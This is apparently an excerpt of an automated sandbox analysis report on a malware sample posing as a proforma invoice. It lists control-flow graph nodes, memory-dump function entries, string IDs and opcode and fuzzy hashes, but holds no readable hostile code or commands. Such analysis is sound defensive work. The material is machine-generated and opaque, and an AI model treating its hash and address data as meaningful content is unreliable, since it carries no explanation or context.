                                                                                            control_flow_graph 2264 2695f38-2695f5a 2265 2695f5c-2695f60 2264->2265 2266 2695f70-2695f7b 2264->2266 2267 2695f88-2695f8f 2265->2267 2268 2695f62-2695f6e 2265->2268 2269 2695f81-2695f83 2266->2269 2270 2696023-269604f 2266->2270 2271 2695faf-2695fb8 2267->2271 2272 2695f91-2695f98 2267->2272 2268->2266 2268->2267 2273 269601b-2696020 2269->2273 2277 2696056-26960ae 2270->2277 2365 2695fba call 2695f29 2271->2365 2366 2695fba call 2695f38 2271->2366 2272->2271 2274 2695f9a-2695fa5 2272->2274 2276 2695fab-2695fad 2274->2276 2274->2277 2276->2273 2296 26960bd-26960cf 2277->2296 2297 26960b0-26960b6 2277->2297 2278 2695fc0-2695fc2 2279 2695fca-2695fd2 2278->2279 2280 2695fc4-2695fc8 2278->2280 2284 2695fe1-2695fe3 2279->2284 2285 2695fd4-2695fd9 2279->2285 2280->2279 2283 2695fe5-2696004 call 26969a0 2280->2283 2289 2696019 2283->2289 2290 2696006-269600f 2283->2290 2284->2273 2285->2284 2289->2273 2368 2696011 call 269afad 2290->2368 2369 2696011 call 269aef0 2290->2369 2293 2696017 2293->2273 2299 2696163-2696165 2296->2299 2300 26960d5-26960d9 2296->2300 2297->2296 2370 2696167 call 26962f0 2299->2370 2371 2696167 call 2696300 2299->2371 2301 26960e9-26960f6 2300->2301 2302 26960db-26960e7 2300->2302 2310 26960f8-2696102 2301->2310 2302->2310 2303 269616d-2696173 2306 269617f-2696186 2303->2306 2307 2696175-269617b 2303->2307 2308 269617d 2307->2308 2309 26961e1-2696240 2307->2309 2308->2306 2323 2696247-269626b 2309->2323 2313 269612f-2696133 2310->2313 2314 2696104-2696113 2310->2314 2315 269613f-2696143 2313->2315 2316 2696135-269613b 2313->2316 2325 2696123-269612d 2314->2325 2326 2696115-269611c 2314->2326 2315->2306 2320 2696145-2696149 2315->2320 2318 2696189-26961da 2316->2318 2319 269613d 2316->2319 2318->2309 2319->2306 2322 269614f-2696161 2320->2322 2320->2323 2322->2306 2333 269626d-269626f 2323->2333 2334 2696271-2696273 2323->2334 2325->2313 2326->2325 2335 26962e9-26962ec 2333->2335 2336 2696275-2696279 2334->2336 2337 2696284-2696286 2334->2337 2341 269627b-269627d 2336->2341 2342 269627f-2696282 2336->2342 2343 2696299-269629f 2337->2343 2344 2696288-269628c 2337->2344 2341->2335 2342->2335 2345 26962ca-26962cc 2343->2345 2346 26962a1-26962c8 2343->2346 2347 269628e-2696290 2344->2347 2348 2696292-2696297 2344->2348 2353 26962d3-26962d5 2345->2353 2346->2353 2347->2335 2348->2335 2355 26962db-26962dd 2353->2355 2356 26962d7-26962d9 2353->2356 2359 26962df-26962e4 2355->2359 2360 26962e6 2355->2360 2356->2335 2359->2335 2360->2335 2365->2278 2366->2278 2368->2293 2369->2293 2370->2303 2371->2303
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Hbq$Hbq
                                                                                            • API String ID: 0-4258043069
                                                                                            • Opcode ID: ef4e138014a405a6f22073fcafa4d9f10b08ae10a3e68830f029e95b41f98572
                                                                                            • Instruction ID: f24f525fea9d621073e6a9efc37b16aacbaa524db86fc63a73341a6e3605de78
                                                                                            • Opcode Fuzzy Hash: ef4e138014a405a6f22073fcafa4d9f10b08ae10a3e68830f029e95b41f98572
                                                                                            • Instruction Fuzzy Hash: B6B1AB707042558FDB159B38C8A4B7E7BAAEF88315F14856AE806CB391DF38DC42CB95
                                                                                            Function 02696498 Relevance: 2.7, Strings: 2, Instructions: 232COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2454 2696498-26964a5 2455 26964ad-26964af 2454->2455 2456 26964a7-26964ab 2454->2456 2458 26966c0-26966c7 2455->2458 2456->2455 2457 26964b4-26964bf 2456->2457 2459 26966c8 2457->2459 2460 26964c5-26964cc 2457->2460 2463 26966cd-2696705 2459->2463 2461 2696661-2696667 2460->2461 2462 26964d2-26964e1 2460->2462 2465 2696669-269666b 2461->2465 2466 269666d-2696671 2461->2466 2462->2463 2464 26964e7-26964f6 2462->2464 2486 269670e-2696712 2463->2486 2487 2696707-269670c 2463->2487 2472 26964f8-26964fb 2464->2472 2473 269650b-269650e 2464->2473 2465->2458 2467 26966be 2466->2467 2468 2696673-2696679 2466->2468 2467->2458 2468->2459 2470 269667b-269667e 2468->2470 2470->2459 2474 2696680-2696695 2470->2474 2475 269651a-2696520 2472->2475 2476 26964fd-2696500 2472->2476 2473->2475 2477 2696510-2696513 2473->2477 2496 26966b9-26966bc 2474->2496 2497 2696697-269669d 2474->2497 2479 2696538-2696555 2475->2479 2480 2696522-2696528 2475->2480 2481 2696601-2696607 2476->2481 2482 2696506 2476->2482 2483 2696515 2477->2483 2484 2696566-269656c 2477->2484 2527 269655e-2696561 2479->2527 2489 269652a 2480->2489 2490 269652c-2696536 2480->2490 2491 2696609-269660f 2481->2491 2492 269661f-2696629 2481->2492 2493 269662c-2696639 2482->2493 2483->2493 2494 269656e-2696574 2484->2494 2495 2696584-2696596 2484->2495 2488 2696718-269671a 2486->2488 2487->2488 2500 269671c-269672e 2488->2500 2501 269672f-2696736 2488->2501 2489->2479 2490->2479 2503 2696611 2491->2503 2504 2696613-269661d 2491->2504 2492->2493 2513 269663b-269663f 2493->2513 2514 269664d-269664f 2493->2514 2505 2696578-2696582 2494->2505 2506 2696576 2494->2506 2517 2696598-26965a4 2495->2517 2518 26965a6-26965c9 2495->2518 2496->2458 2498 26966af-26966b2 2497->2498 2499 269669f-26966ad 2497->2499 2498->2459 2509 26966b4-26966b7 2498->2509 2499->2459 2499->2498 2503->2492 2504->2492 2505->2495 2506->2495 2509->2496 2509->2497 2513->2514 2521 2696641-2696645 2513->2521 2522 2696653-2696656 2514->2522 2528 26965f1-26965ff 2517->2528 2518->2459 2530 26965cf-26965d2 2518->2530 2521->2459 2523 269664b 2521->2523 2522->2459 2524 2696658-269665b 2522->2524 2523->2522 2524->2461 2524->2462 2527->2493 2528->2493 2530->2459 2532 26965d8-26965ea 2530->2532 2532->2528
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ,bq$,bq
                                                                                            • API String ID: 0-2699258169
                                                                                            • Opcode ID: e8e68e508f8b4002cc274ab7773e44d1ff1bd7eab2ac4367dad111b35d582680
                                                                                            • Instruction ID: efff7afc9d5dcc3d7d73a17e52b94e5125207fc9765a73f07b3a801d9764e117
                                                                                            • Opcode Fuzzy Hash: e8e68e508f8b4002cc274ab7773e44d1ff1bd7eab2ac4367dad111b35d582680
                                                                                            • Instruction Fuzzy Hash: 2B816E34A00605CFCF18DF69C488A6ABBBEFF89314B258169D506DB365DF31E842CB52
                                                                                            Function 02693CB1 Relevance: 2.6, Strings: 2, Instructions: 115COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Xbq$Xbq
                                                                                            • API String ID: 0-1243427068
                                                                                            • Opcode ID: a2192c832dca7e0070da08332f31705770970b2296786253f4aa4feeebb79370
                                                                                            • Instruction ID: e0b54bac0eb118b148292e17da99c5bd66c59d90db0982533ff1e0022c725306
                                                                                            • Opcode Fuzzy Hash: a2192c832dca7e0070da08332f31705770970b2296786253f4aa4feeebb79370
                                                                                            • Instruction Fuzzy Hash: 2131E235B442258BDF1C4A6D89A427EB6AAEBC4205F1844BAE802C73D4DF75CC9AC791
                                                                                            Function 02698EF8 Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $^q$$^q
                                                                                            • API String ID: 0-355816377
                                                                                            • Opcode ID: 3124b6de38671f98807ca673f3de266f5d1f92dee5797cc5e9726853f24925f8
                                                                                            • Instruction ID: 7f160d79d3cc2f5dde8be6e1a6f5bcaf0b42e3e9084957d85f9165b6b6cb7440
                                                                                            • Opcode Fuzzy Hash: 3124b6de38671f98807ca673f3de266f5d1f92dee5797cc5e9726853f24925f8
                                                                                            • Instruction Fuzzy Hash: 6D31E4703041458FDF298B39D8A473E776BEB86781B1564AAF012DB392EF29CC82C751
                                                                                            Function 02699D59 Relevance: 2.5, Strings: 2, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'^q$4'^q
                                                                                            • API String ID: 0-2697143702
                                                                                            • Opcode ID: fc59af0154cacc18c65bf8a36116a6c604a0fe37c7184c48aa35f818c47d1a7d
                                                                                            • Instruction ID: 01320c91f409b72705edea5232920b714f57d0c27cfe1f7d4f12c117ff13a793
                                                                                            • Opcode Fuzzy Hash: fc59af0154cacc18c65bf8a36116a6c604a0fe37c7184c48aa35f818c47d1a7d
                                                                                            • Instruction Fuzzy Hash: 2FF068353011186FDB082AAA986497FBBDFEBCC361B14442DB90AC7390DE76CC4297A1
                                                                                            Function 02690C8F Relevance: 1.8, Strings: 1, Instructions: 546COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: LR^q
                                                                                            • API String ID: 0-2625958711
                                                                                            • Opcode ID: cf29e8e63557c0a8e63b2ef8a67d792b0530b3b86653cc25630b8dded6a2f5c6
                                                                                            • Instruction ID: e0d1a6fa6b001d712d11254bf9dc7af2bf794782da6bfd8e34a649fb373b5b91
                                                                                            • Opcode Fuzzy Hash: cf29e8e63557c0a8e63b2ef8a67d792b0530b3b86653cc25630b8dded6a2f5c6
                                                                                            • Instruction Fuzzy Hash: 42522074D01619CFCB54EF64E998A8DBBB2FB88301F1045E9D409A7368DB70AE85DF81
                                                                                            Function 02690CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: LR^q
                                                                                            • API String ID: 0-2625958711
                                                                                            • Opcode ID: e9336098908628e34c9e75232105003745cb0873a013f913005517f024c69495
                                                                                            • Instruction ID: 5c31cc10f4354b03218bda12b88c1de92aaeb4563ef498afdbd84699a561b308
                                                                                            • Opcode Fuzzy Hash: e9336098908628e34c9e75232105003745cb0873a013f913005517f024c69495
                                                                                            • Instruction Fuzzy Hash: 67522174D01619CFCB54EF64E998A8DBBB2FB88301F1045E9D409A7368DB70AE85DF81
                                                                                            Function 0658992C Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LdrInitializeThunk.NTDLL(00000000), ref: 06589A6E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4194981319.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_6580000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: cb8e26765b5caab5ee86bddb3944fc6a53f3d688bbdd377e75de24eabb8b8dbc
                                                                                            • Instruction ID: 801986394c24f7aa6ea934d33ee352c8531ea543c9b400d1a306a903f90baa69
                                                                                            • Opcode Fuzzy Hash: cb8e26765b5caab5ee86bddb3944fc6a53f3d688bbdd377e75de24eabb8b8dbc
                                                                                            • Instruction Fuzzy Hash: 4E117974E041099FDB84EFADD884ABDBBB5FB88314F148169E804F7641EB30A981CB60
                                                                                            Function 0269E129 Relevance: .7, Instructions: 655COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 857ac912fb87a8d64e1ee05a8a99b1fd82a7aec0bd652f0ab5b9879bf43855db
                                                                                            • Instruction ID: 98e0d884ac658b0cfe8a3aa93a1f3a3281b083efa5637cc0a3a9aaafa0426f8d
                                                                                            • Opcode Fuzzy Hash: 857ac912fb87a8d64e1ee05a8a99b1fd82a7aec0bd652f0ab5b9879bf43855db
                                                                                            • Instruction Fuzzy Hash: 7B12A87582125B8FE6402B20F6BC2AEBB60FB5F327344AD55F10BC0295DB785C89DE61
                                                                                            Function 0269E138 Relevance: .6, Instructions: 647COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 49e9183ca3d1e03a445cd14ecab623ceb04bb289c4e60ae91c720487199af09d
                                                                                            • Instruction ID: 2a58fda8f1c2782e01a8e8211a070ddc7c66d2ab418785971fb06e37a693d862
                                                                                            • Opcode Fuzzy Hash: 49e9183ca3d1e03a445cd14ecab623ceb04bb289c4e60ae91c720487199af09d
                                                                                            • Instruction Fuzzy Hash: EF12A77582125B8FE6402B24F6BC26EBB60FB5F327344AD15F10BC0295DBB85C89DE61
                                                                                            Function 026980D8 Relevance: .2, Instructions: 201COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5006e71d62be2dcc7a6b309a3590521141ec1492f9b0a97836ff32226abd4d84
                                                                                            • Instruction ID: cfab7195a181d585d287465a2754cea2808131e5307ce6d8619d0fa69a87f0f9
                                                                                            • Opcode Fuzzy Hash: 5006e71d62be2dcc7a6b309a3590521141ec1492f9b0a97836ff32226abd4d84
                                                                                            • Instruction Fuzzy Hash: A4714A347006068FCF15DF68C894A6E7BEAAF8A705B1500AAE806DB3B1DF74DC41CB91
                                                                                            Function 0269F527 Relevance: .1, Instructions: 147COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a8c70ea0ea33a590c3069335e77073550f721a3f5c2928aeab95aba38d7bb150
                                                                                            • Instruction ID: b7dbbd66a1584ddeca4d619c434613d386b68a89f47c3617e4b7484c83a9928b
                                                                                            • Opcode Fuzzy Hash: a8c70ea0ea33a590c3069335e77073550f721a3f5c2928aeab95aba38d7bb150
                                                                                            • Instruction Fuzzy Hash: 4D513174D01309DFDB14DFA4D994AAEBBB2FF88304F208169D809AB394DB359986CF41
                                                                                            Function 0269D869 Relevance: .1, Instructions: 144COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2bbc019ae6f41453654b80b83f54db603668f86dc77fb0584b1f2889e1f6ce44
                                                                                            • Instruction ID: 8e699b3a822ff725c6a8614c9bc3d89de5ef806f0f055c1f3fbcc020cf99ac77
                                                                                            • Opcode Fuzzy Hash: 2bbc019ae6f41453654b80b83f54db603668f86dc77fb0584b1f2889e1f6ce44
                                                                                            • Instruction Fuzzy Hash: 95519374E012189FDB58DFA9D5849DDBBF2FF89310F209169E809AB365DB319946CF00
                                                                                            Function 02694197 Relevance: .1, Instructions: 139COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 57aa6307b8375c045f83b3a1faf8b2ec882f18184148ddf66535cf154e2fb2d2
                                                                                            • Instruction ID: b2301a94607f349f9e1ee529e1192b5c5f553cc23e63e74683000e3c96f01fe0
                                                                                            • Opcode Fuzzy Hash: 57aa6307b8375c045f83b3a1faf8b2ec882f18184148ddf66535cf154e2fb2d2
                                                                                            • Instruction Fuzzy Hash: 0D51B274E01208DFCB48DFA9D59499DBBF2FF89314B209569E809AB324DB35AD42CF50
                                                                                            Function 026941A0 Relevance: .1, Instructions: 134COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e658e7c197123b1e69db51b0c2eb498360952d76288729d2b93f5d1b721848b5
                                                                                            • Instruction ID: 32c3a5c0fd4efdfd77ca6da73fa7b3941ec9d5f8cdf9b07d1a0568ce74dd6a38
                                                                                            • Opcode Fuzzy Hash: e658e7c197123b1e69db51b0c2eb498360952d76288729d2b93f5d1b721848b5
                                                                                            • Instruction Fuzzy Hash: 6D51B074E01308CFCB08DFA9D59499DBBF6FF89314B209469E809AB324DB35A942CF50
                                                                                            Function 0269A303 Relevance: .1, Instructions: 124COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e9e2509380bab5aa21f9eae5e97b15125182e1dfaa9cb9e8fa7bbe528e5698d8
                                                                                            • Instruction ID: 06abc61fcb8011fa203680c38737305d1c12648e6a8a10d77ce0dd547bb780e7
                                                                                            • Opcode Fuzzy Hash: e9e2509380bab5aa21f9eae5e97b15125182e1dfaa9cb9e8fa7bbe528e5698d8
                                                                                            • Instruction Fuzzy Hash: 1A415931A04249DFCF15CFA8C844AADBBF6EF4A354F048156E945AB392DB34ED15CB50
                                                                                            Function 02699C30 Relevance: .1, Instructions: 107COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 68c85fb8ddce74a7632748acbde320e218fc3b6839b6b9d86fc222e46a3a7dee
                                                                                            • Instruction ID: 656b418be7e784d32d38b9a7e92792bbdd8d8d4baf1b98b111a482c6dc0c0985
                                                                                            • Opcode Fuzzy Hash: 68c85fb8ddce74a7632748acbde320e218fc3b6839b6b9d86fc222e46a3a7dee
                                                                                            • Instruction Fuzzy Hash: 79417E706052458FDB00CF6CC884B6A7BAAEF89305F54846AE908CB395DB75EC46CB91
                                                                                            Function 02695658 Relevance: .1, Instructions: 101COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8b87274d29251bdbeb68374d6ad51e09c2476b6888b315e3b5e6a868a9c2f024
                                                                                            • Instruction ID: 36f42bbee29ce2c5221c23b82219e216b9d11c96a13d91005431cb62606d4946
                                                                                            • Opcode Fuzzy Hash: 8b87274d29251bdbeb68374d6ad51e09c2476b6888b315e3b5e6a868a9c2f024
                                                                                            • Instruction Fuzzy Hash: 7C31A031300249EFDF06AF64D858AAE7BB6FB88341F104065F9169B354DB35DE21DB91
                                                                                            Function 02692790 Relevance: .1, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a4df318861d23e2e18a5ba6d2bce4cf7e98e5a602deac728c3d93d45fee00d08
                                                                                            • Instruction ID: 93785f2606d4eec527404507b3a63bce7f953836044fd2debd925d8e661a49bc
                                                                                            • Opcode Fuzzy Hash: a4df318861d23e2e18a5ba6d2bce4cf7e98e5a602deac728c3d93d45fee00d08
                                                                                            • Instruction Fuzzy Hash: 7B318AB4D052498FCB01DFB8D5A41EEBFB5EF4A314F1041AAD804B7351EB350A46CBA1
                                                                                            Function 02698380 Relevance: .1, Instructions: 87COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6f242c9db921d57f51ce5234e64a447125064479593e885e54dfcefddb85acea
                                                                                            • Instruction ID: d654dc0babcd3a3a8b80acff6114ea3aaaed9d0c11ac6e3b5a96fe30ed597a4a
                                                                                            • Opcode Fuzzy Hash: 6f242c9db921d57f51ce5234e64a447125064479593e885e54dfcefddb85acea
                                                                                            • Instruction Fuzzy Hash: F22168313042014BEF185A2A846873A769BAFC7F59F148079D506CB7A8EF7ACC42D382
                                                                                            Function 02698370 Relevance: .1, Instructions: 86COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d1c8010ef34c285da804ef1f7699ab89f3dbe49044357a43465246b33facbaf0
                                                                                            • Instruction ID: a4d804e274a6c5454a5b7dfaee546934a7f2d38dbbd199b8ef9450017987cdbb
                                                                                            • Opcode Fuzzy Hash: d1c8010ef34c285da804ef1f7699ab89f3dbe49044357a43465246b33facbaf0
                                                                                            • Instruction Fuzzy Hash: AA21AC713042014BDF191B35D46863E76ABAFC7E4AB18806AD946CB3A5EF69CC52D382
                                                                                            Function 026928F0 Relevance: .1, Instructions: 77COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 97bf52ce880811a21f71375b636189e57ce926a01ce0a5ad5c30b8b5b15f177c
                                                                                            • Instruction ID: 138b47ffae56b6ef1f8a2d1a9997e068701193ef4c4bcc3579aea722e47c9f19
                                                                                            • Opcode Fuzzy Hash: 97bf52ce880811a21f71375b636189e57ce926a01ce0a5ad5c30b8b5b15f177c
                                                                                            • Instruction Fuzzy Hash: 34219A75A00105AFCF24DF24C450AAE77A9EB9D664B20C459EC5E9B340DF34EA43CBD2
                                                                                            Function 025FD28C Relevance: .1, Instructions: 76COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4177868623.00000000025FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025FD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_25fd000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: df19290b1484029d6fd033bb790f8f42dfa876161b7184ea1a2fbff9068f18ef
                                                                                            • Instruction ID: a6e35adb75754d17c3f72dce3c23d154e068e5dccdbdc2aace4e265d18c14da9
                                                                                            • Opcode Fuzzy Hash: df19290b1484029d6fd033bb790f8f42dfa876161b7184ea1a2fbff9068f18ef
                                                                                            • Instruction Fuzzy Hash: 21212272504200DFDB45DF14D9C0B2ABFB5FB88314F24C5A9EA094B296C33AD416CBA2
                                                                                            Function 02696300 Relevance: .1, Instructions: 74COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 775a1e0e4e27c4b9fc4d9cca13e573624c0cc0983b639ae8939f9797bf9cb698
                                                                                            • Instruction ID: f8fcb7c61939f54853ab0729b75fcc19c8418e63b3a069ba9cfc2dfb331b1152
